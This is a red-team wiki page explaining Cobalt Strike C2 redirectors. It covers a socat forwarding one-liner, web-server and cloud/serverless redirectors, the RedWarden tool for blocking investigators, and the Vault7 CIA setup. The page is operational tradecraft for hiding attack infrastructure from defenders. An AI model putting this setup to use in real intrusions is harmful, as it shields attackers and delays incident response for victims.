CodeX's Terminal Window
  • root@codex
  • 🐙Red Team
    • Red Team OPSEC
      • Initial Recon
      • Weaponization
      • Infrastructure
        • Example Red Team Infra
        • Cobalt Strike Redirectors
        • Using SSH Tunneling to secure C2 infra
      • Phishing
      • Internal Recon
      • Lateral Movement
      • Post-Exploitation
      • Exfiltration
      • Cleanup
    • Red Team TTPs
      • Active Directory
      • Persistence
      • Exfiltration
      • Phishing
      • Windows Bypasses
    • Red Team Dev
      • Extending Havoc C2
        • Third Party Agents
          • 1: Understanding the interface
          • 2: Writing the agent
          • 3: Writing the agent handler
          • 4: Testing the agent
      • Loader Dev
        • In Memory OPSEC
          • PE Structures
          • Memory Permissions and Allocation Types
          • In Memory Signatures
          • Thread Stack
          • Windows Events
          • Userland Hooks
          • AMSI & ETW
        • Evasion Adventures
        • Loader basics
        • Sleep masking
        • Mimikatz vs Windows Defender
        • Indirect syscalls
    • Cobalt Strike
      • Modifying the Sleep Mask Kit
      • Discord Beacon Notifications
      • Evading Hunt-Sleeping-Beacons
      • Beacon Object Files
    • Misc. Interesting Stuff
  • 🛡️Blue Team
    • Detecting Cobalt Strike
      • Sleep Mask Kit IOCs
      • Hunting Beacon in the heap
      • Decrypting C2 traffic with known key
  • 🚩CTF Solutions
    • Cyber Defenders Discovery Camp 2021
      • 👁️‍🗨️Lets Go Hunting
      • 🐧Linux Rules The World!
      • 📻Going active
      • 🗄️File it away
      • 😷Behind the mask
  • Box challenges
    • 📦Box Writeups
  • Me myself and I
    • root@codex #
Powered by GitBook
On this page
  • What is a redirector
  • Simple redirector
  • Standard redirector
  • Open source projects
  • Using cloud services as redirectors
  • CIA redirector setup (Old Vault7 leak)
  1. Red Team
  2. Red Team OPSEC
  3. Infrastructure

Cobalt Strike Redirectors

A redirector a day keeps IR away

PreviousExample Red Team InfraNextUsing SSH Tunneling to secure C2 infra

Last updated 2 years ago

What is a redirector

During offensive operations, offensive infrastructure such as teamservers, phishing and staging servers ae often discovered by defensive teams, who then take action against them such as blocking them at the network perimeter or attempting to get the infrastructure taken down by hosting providers.

In order to minimize impact caused by these defensive responses, offensive teams often deploy proxy servers in front of their offensive backend, which are commonly referred to as redirectors. In this case, when a defense team blocks the beacon callback ip, rather than blocking the C2 server they are blocking the ip of the redirector, which can be easily swapped out for another one without having to rebuild the teamserver.

This can be combined with SSH tunneling and a private subnet to prevent unauthorized connection/scanning of the malicious components of our offensive infrastructure.

SSH tunneling:

A common redirector setup is shown below, taken from this other .

While there are many ways of running these proxy systems, with different pros and cons for each type, they all have the same purpose, of redirecting traffic from the target to the backend offensive infrastructure, and vice versa.

Simple redirector

Simple TCP redirector using socat. All it does is redirect traffic to the backend and nothing else.

Here’s the socat command to forward connections to port 80 to 54.197.3.16:

socat TCP4-LISTEN:80,fork TCP4:54.197.3.16:80

Standard redirector

A very standard redirector setup. Standard webserver security can be used to provide some level of protection for the backend infrastructure without too many extra tricks. Uses an existing HTTP webserver service such as apache/nginx to redirect HTTP traffic (for http/s beacons of course) to the teamserver. For phishing redirectors, smtp servers such as postfix can be setup to redirect emails.

Open source projects

Using cloud services as redirectors

Services like azure app services and AWS beanstalk can be used to redirect traffic to your offensive infrastructure. The main benefit of these redirectors is that they often come with domain names or SSL certificates from their respective cloud hosting provider, which may make them look less suspicious and get past some network filers.

Serverless code can also be used as redirectors in a similar way. Here are some examples of cloud services as redirectors:

Serverless redirectors can have features similar to "smart" redirectors, depending on the code used.

CIA redirector setup (Old Vault7 leak)

The CIA also has been known to use C2 redirectors, based on the (now old) vault7 leaks. This is explained more in detail in the following post by byt3bl33d3r. Their infrastructure closely resembles modern red team infrastructure and tools, where beacons call back to a set of redirectors which forward traffic to a C2 server. They seem to favor mTLS to authenticate their implants at the redirector level, making it harder to investigate their backend infrastructure externally.

Starting shell companies to host redirectors is probably not practical for any non state backed operators. lol.

This type of redirector is documented on the Cobalt Strike website .

The apache redirector using mod_rewrite is documented .

There are open source (or otherwise) projects that aim to add defensive or evasive capabilities to C2 redirectors. One example of this is , by mgeeky. This redirector project has additional capabilities such as blocking and logging traffic that could potentially be from defensive teams investigating the infrastructure. This type of redirector can be useful in slowing down defensive response, in addition to proxying traffic for the C2 server.

🐙
here
here
RedWarden
https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/azure-web-app-service-for-offensive-operations/
https://blog.xpnsec.com/aws-lambda-redirector/
https://byt3bl33d3r.substack.com/p/taking-the-pain-out-of-c2-infrastructure-3c4
Using SSH Tunneling to secure C2 infra
website
Vault7 leaked documentation of CIA's offensive infrastructure
https://www.ired.team/offensive-security/red-team-infrastructure/automating-red-team-infrastructure-with-terraform
https://bluescreenofjeff.com/2016-06-28-cobalt-strike-http-c2-redirectors-with-apache-mod_rewrite/
https://github.com/mgeeky/RedWarden